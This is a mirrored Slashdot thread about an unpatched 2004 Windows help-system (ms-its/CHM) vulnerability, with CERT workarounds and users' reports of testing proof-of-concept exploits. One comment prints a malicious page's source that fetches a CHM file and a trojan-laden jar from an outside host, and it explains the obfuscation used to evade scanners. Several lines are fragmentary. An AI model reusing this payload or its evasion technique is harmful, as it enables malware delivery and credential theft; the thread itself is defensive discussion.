Slashdot Mirror
New Windows Vulnerability in Help System
wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."
Although there's no specific patch, the Windows XP SP2 release candidate mitigates this problem.
Most of us here have already modified our systems knowing that having even the IE exe file or outlook express exe file could cause problems and have removed it (even in spite of the hidden little annoying backup). Remember to get rid of IE be sure to look in the folder /windows/system32/dllcache for those backup exe files that it uses to restore when you try and rip IE or outlook out yourself.
They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC-exploits here on Slashdot for people check for themselves. ... what took them so long?
Jelmer's PoC is good: link
(That page is the info page, you won't get hit by clicking on the link directly)
it's in my head
mshtml.dll for one. Oh and hope that explorer is not broken in the process.
Use the runas service to do administrative stuff. You can either use it in command line form or hold down shift and right click on an executable. It works on most control panel applets as well.
This is a much broader problem than merely stupid/lazy users.
Remember to backup your registry (or at least this portion of it)
a nd ler\{ms-its,ms-itss,its,mk}
From the CERT article:
Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.
Disable ITS protocol handlers
Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\H
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.
Follow good Internet security practices
These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.
Disable Active scripting and ActiveX controls
NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.
To install new software, users (except the totally clueless) log in as an administrative user, or even choose to run the setup program as an administrative user while being logged in as an unprivileged user.
I don't do this, and not because I'm clueless, but because there are lots of pieces of software that I am forced to use that need you to be logged in as not only an Administrator, but THE Administrator. Most of this software was made for Windows 95 or Windows 98, and some even for Windows 3.x.
We had the release of a "conceptual" Trojan yesterday.... but not a real virus.
Some software company was trying to sell their mac virus software. A real ID3 tag Mac Trojan does not exist right now.... and odds are we will see patches before one comes to be.
"Things are more moderner than before- bigger, and yet smaller- it's computers-- San Dimas High School football RULES!"
The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says,"Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".
i checked the link from the poster above,and it did not seem to do anything on Mozilla 1.7B
There is a proof of concpet page here. Neither mozilla nor firefox are susceptible.
trojan viruses have been in the wild for atleast a week, probably more, you get infected by visiting a website (with IE ofcourse) and then it spams URLs of the trojan via mIRC.. the process is something like wsz32.exe or nosc32.exe (in %windir%\system32\)
Save it as chm-disable.reg
Put a line like this in your logon script:
regedit
Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
Note: If you're still using batch files: KiXtart is your friend!
...but Mr MS-Security himself said that there were NO exploits prior to the security patches !
Maybe we deserve this world ?
I played with fire and tested the PoC found here
In IE, it copied itself over wmplayer.exe, SFP copied the original back, but that was enough for me. Firefox 0.8, OTOH, didn't budge and nothing happened to wmplayer.exe. Same thing with Netscape 7.1 and Opera 7.23.
At least in this case, IE seems to be the only one.
I still run Windows 2000 as a non-privileged user. But whenever apps act funny as a normal user, I go to administrator mode and hand out full control over the appropriate directory in \Program Files. That usually solves the problem.
8 of 13 people found this answer helpful. Did you?
I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here.
s peed.planet.nl/security/newone/modified//EXPLOIT.C HM::/exploit.htm
.chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
---------
Windows XP Professional Service Pack 1
Mozilla Firebird 0.8 run as limited user: no apparent effect
Mozilla Firebird 0.8 run as administrator: no apparent effect
Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:
Line 47, Char: 5, Error: Write to file failed, Code: 0
URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.
Internet Explorer 6 run as administrator: demo exploit runs as expected
A software restriction policy is in place on this machine, forbidding the execution of any executable files (including
------------
Windows XP Professional Service Pack 2 RC 1
Internet Explorer 6 run as administrator: no apparent effect
Fixed in SP2?
---------------
One thing that concerns me about using this particular sample code as a test, is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invuelnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the program files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?
This sounds bad. I know we've convinced users to not open attachments such as .vbs files and the like. But now we have to somehow tell them not to open .htm(l) files as well?
Didn't MS get into trouble before when disclosing security holes? Now everyone who is interested knows exactly how to get in the door. No?
Whatever the reason really is, this is why I like my linux and Mac computers. I don't have to deal with this problem.
#|
The code was for IE5, this is very unlikely. And a patch is available, its called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.
Is that all you have to do? I just stopped and disabled the "Help and Support" service in WinXP Home. But then when I try "Help and Support" from the Start menu, that service switches itself to Automatic and starts again! Of course I won't be opening H&S any time soon.. but if "disabled" doesn't mean much, will it stop a virus? Or just start itself back up again?
You want a sig? I can get you a sig... Hell, I can get you a sig by 3 o'clock this afternoon... with nail polish.
You *may* be vulnerable if you have the network.protocol-handler.external.ms-help parameter in about:config set to true (at least on mozilla 1.7b). The default is false. I'm not able to test this out right now, can anyone verify this?
Excellent point. Happens on both platforms, actually - Digidesign's audio editor "ProTools" insists on being run as an Administrator and will not let anyone non-Administrator run it. Their reasoning is that somehow ProTools has magic abilities to delete files that users don't have permissions for, and for a non-admin user to use ProTools, it would give them the additional permissions. Completely wrong.
They have put out a beta version that removes that restriction, but it's not fully tested yet. Seems to work for me, though.
-T
Mozilla is not vulnerable.
There are two kinds of protocol handlers in Windows: system-wide and IE-specific. Mozilla supports the system-wide protocols but not the IE-specific protocols. ms-its is an IE-specific protocol.
We should probably take a second look at the system-wide protocols, though. Currently we blacklist some and let the rest through.
This advice works well. And, I wish I could follow it universally on client machines. Unfortunately, any user that needs to syncronize their Palm Pilot with Outlook can't, unless they're an administrator. So every "executive" must have adminstrator privilages for their machine, even though they're also the least likely to understand the security implications of this.
Also, some virus scanners can't update their signature files without adminstrator privileges, meaning you either make the user an adminstrator (power user doesn't cut it), or you don't keep them up-to-date on virus scanning without an adminstrator hitting each and every machine.
I found this page yesterday, it is an exploit of this vulnerability.
; s-its:mhtml:file://c:\\nosuch.mht!http://hard-virg ins.com/sher/x.chm::/x.htm'));t width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
/.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SERVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here.
http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'m
</script>
<apple
</body></html>
This loads and runs the x.chm file from
http://hard-virgins.com/sher/x.chm
and also the loader.jar file from
http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for ansering my question
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) than norton will stop these exploits from running and delete them, but they still get on your system just fine.
So careful out there, this exploit is dangerous.
"The crows seemed to be calling his name, thought Caw."
Never said Konqueror was a part of GNU/Linux. I actually carefully worded that sentence to avoid that impression. *Sigh*
My point wasn't against the security of Linux or KDE, but against the hypocrisy of claiming that IE should be unbundled because integration == bad security. I'm not talking about the kernel or CLI or anything like that, I'm talking about the desktop environment. Windows provides one, and so does KDE. The fact that you could use Gnome or Xfce isn't relevant, because they don't have the same kind of integration.
If you don't install Konqueror/KHTML when you install KDE, your help system is screwed, as are any apps that embed a KHTML component. In that respect, IE/mshtml and Konq/khtml are comparable.
Karma: Contrapositive
To install the Linux version of Heretic II I had to click on some file called setup.sh and it installed. Sure I had to download a patch from www.lokigames.com, but you usually need to do that for Windows games anyway.
My point is that you are blaming Linux for a lousy installer. I have seen some lousy installs in Windows too.
Sure for a Linux Box you need the X Window System installed and setup correctly, but with Windows to run the latest games you need to install the latest video drivers to go with the latest DirectX 9.x you just installed (because Microsoft didn't get it right the firxt 8 times???) Most Windows game installers come bundled with the needed version of Direct X. Maybe linux installers should check that the needed components are installed an configured correctly.
Quake 3 is kind of an extreme example of how dificult too many developers make their installs.
Anonymous Coward wrote,[Q]
So, I guess the point I'm trying to make is that what seems easy and natural to Linux geeks is definitely not what regular people consider easy and natural. Hence, the preference towards Windows.
[/Q]
Double clicking on an icon isn't natural either. For those who have never seen a new computer user learn to use a mouse it goes something like this.
By the way, have you ever tried to setup Windows XP to browse smb shares on a local network when someone has coutomized it so there is not Nework Neighborhood (or whatever it is now called) on the desktop? Windows does it's fare share of stupid things too.
"Now go to My Computer."
*click*
"You need to double click it."
*click* *long pause* *click*
"You need to double click faster than that."
*click* *slightly shorter pause* *click*
Solitaire is a great training tool for those who don't catch on quickly.
Losing faith in humanity one person at a time.